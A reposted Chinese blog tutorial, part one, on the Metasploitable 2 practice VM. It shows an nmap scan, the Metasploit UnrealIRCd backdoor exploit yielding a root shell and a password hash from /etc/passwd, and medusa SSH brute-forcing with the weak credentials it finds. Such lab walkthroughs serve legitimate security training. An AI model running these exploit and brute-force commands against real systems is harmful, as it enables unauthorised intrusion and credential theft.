欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

Metasploitable 2 漏洞演练系统使用指南(上)

程序员文章站 2022-03-19 10:11:21
今天要给大家介绍的是Metasploitable漏洞演练系统,他的作用是用来作为MSF攻击用的靶机,他是一个具有无数未打补丁漏洞与开放了无数高危端口的渗透演练系统,在这里,猥琐的黑阔们可以尽情...
今天要给大家介绍的是Metasploitable漏洞演练系统,他的作用是用来作为MSF攻击用的靶机,他是一个具有无数未打补丁漏洞与开放了无数高危端口的渗透演练系统,在这里,猥琐的黑阔们可以尽情地想出各种淫荡的思路对这个渗透演练系统进行攻击,当一个猥琐的思路不行时你马上可以换一个新的猥琐思路,这也是”回溯(backtarck)”的精髓吧!

 

废话不多说,马上进入正题( ̄▽ ̄):

 

 

 

系统简介:

Metasploitable是一个虚拟机文件,从网上下载解压之后就可以直接使用,无需安装。Metasploitable基于Ubuntu Linux,由于基于Ubuntu,用起来十分得心应手。Metasploitbale建立的初衷,其实就是为了测试一下本家的MSF漏洞框架集工具,所以,它的内核是2.6.24,而且一般在Liunx会产生问题的服务、工具或者软件它都集齐了(请看下文…)。版本2添加了更多的漏洞,而且更让人兴奋的是,系统搭载了DVWA、Mutillidae等Web漏洞演练平台。什么?不懂这是什么?请查看:http://www.2cto.com/Article/201306/216233.html 脑补<( ̄) ̄)>……

 

 

 

如何开始

虚拟机设置完毕后, 就可以登录Metasploitable啦,用户名是 :msfadmin 密码是: msfadmin. 在shell中执行ifconfig命令来查看你的IP 地址.

 

msfadmin@metasploitable:~$ ifconfig

 

 

 

eth0      Link encap:Ethernet  HWaddr 00:0c:29:9a:52:c1

 

inet addr:192.168.99.131  Bcast:192.168.99.255  Mask:255.255.255.0

 

inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link

 

UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

 

 

 

 

 

开启的服务

 

 

开启网络之后,我们就可以在我们的攻击主机(类似BackTrack或是Kali)开始我们的渗透之旅了, 渗透的第一步当然是识别出那些端口和服务是开放着啦。在我们用神器Nmap扫描过后,我们可以发现Metasploitable开放着一些众多端口:

 

 

 

root@ubuntu:~# nmap -p0-65535 192.168.99.131

 

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2013-05-29 21:14 PDT

 

Nmap scan report for 192.168.99.131

 

Host is up (0.00028s latency).

 

Not shown: 65506 closed ports

 

PORT      STATE SERVICE

 

21/tcp    open  ftp

 

22/tcp    open  ssh

 

23/tcp    open  telnet

 

25/tcp    open  smtp

 

53/tcp    open  domain

 

80/tcp    open  http

 

111/tcp   open  rpcbind

 

139/tcp   open  netbios-ssn

 

445/tcp   open  microsoft-ds

 

512/tcp   open  exec

 

513/tcp   open  login

 

514/tcp   open  shell

 

1099/tcp  open  rmiregistry

 

1524/tcp  open  ingreslock

 

2049/tcp  open  nfs

 

2121/tcp  open  ccproxy-ftp

 

3306/tcp  open  mysql

 

3632/tcp  open  distccd

 

5432/tcp  open  postgresql

 

5900/tcp  open  vnc

 

6000/tcp  open  X11

 

6667/tcp  open  irc

 

6697/tcp  open  unknown

 

8009/tcp  open  ajp13

 

8180/tcp  open  unknown

 

8787/tcp  open  unknown

 

39292/tcp open  unknown

 

43729/tcp open  unknown

 

44813/tcp open  unknown

 

55852/tcp open  unknown

 

MAC Address: 00:0C:29:9A:52:C1 (VMware)

 

 

 

 

 

呵呵,如果在真实情况下看到目标机开这么多端口,是不是做梦都会笑醒捏~( ̄▽ ̄)~*

 

 

 

 

 

实例演示:

举个栗子,在6667端口, Metasploitable运行着 UnreaIRCD IRC 后台守护程序,这个版本存在一个自动向其他正在监听状态中的端口发送一个紧跟“AB”信件的系统命令的漏洞(国外文章翻译,我也不知它在讲个什么杰宝~~~<( ̄) ̄)>)

 

./msfconsole

 

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor

 

msf  exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131

 

msf  exploit(unreal_ircd_3281_backdoor) > exploit

 

[*] Started reverse double handler

 

[*] Connected to 192.168.99.131:6667…

 

    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…

 

    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead

 

[*] Sending backdoor command…

 

[*] Accepted the first client connection…

 

[*] Accepted the second client connection…

 

[*] Command: echo 8bMUYsfmGvOLHBxe;

 

[*] Writing to socket A

 

[*] Writing to socket B

 

[*] Reading from sockets…

 

[*] Reading from socket B

 

[*] B: “8bMUYsfmGvOLHBxe\r\n”

 

[*] Matching…

 

[*] A is input…

 

[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:60257) at 2012-05-31 21:53:59 -0700

 

id

 

uid=0(root) gid=0(root)

 

cat /etc/passwd | grep root

 

root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9ELid.:14747:0:99999:7:::

 

小手一抖,权限我有!

 

暴力破解弱口令:

为了增加可玩性, Metasploit2 的密码强度设置十分糟糕,从系统账号到数据库账号 除了一个密码和账户名相同(msfadmin)的账号 ,它的系统还存在下表所示的弱密码,真是弱爆了啊. 而且ssh也无加密呀,利用medusa工具暴力破解ssh,即可快速暴力破解。

 

 Metasploitable 2 漏洞演练系统使用指南(上)

 

root@bt :/medusa –h 192.168.235.12 –U /home/test/user.txt –P /home/test/word.txt –M ssh

 

很轻松就跑出了下面的密码

 

ACCOUNT FOUND : [ssh] host:192.168.235.12 User:user Password:user [SUCCEED]

 

ACCOUNT FOUND : [ssh] host:192.168.235.12 User:msfadmin Password:msfadmin [SUCCEED]

 

ACCOUNT FOUND : [ssh] host:192.168.235.12 User:klog Password:123456789 [SUCCEED]

 

 

 

Metasploitable官方专栏:http://www.offensive-security.com/metasploit-unleashed/Metasploitable

 

Metasploitable下载地址:http://sourceforge.net/projects/metasploitable/files/Metasploitable2

 

 

 

本来还有一个ssh远程溢出提权的,但是昨晚弄到吐血也没搞出来,不解不解~~~

 

好!今天的内容就到这里,下次还会继续介绍Metasploitable的几个实战栗子,请大家继续关注不要错过yoooooooooooooo~~~~~~~~~~~

 

 

本文来自: 网络安全攻防研究室(www.91ri.org) 请尊重作者,转载时带上版权信息。 详细内容请参考:http://www.91ri.org/6138.html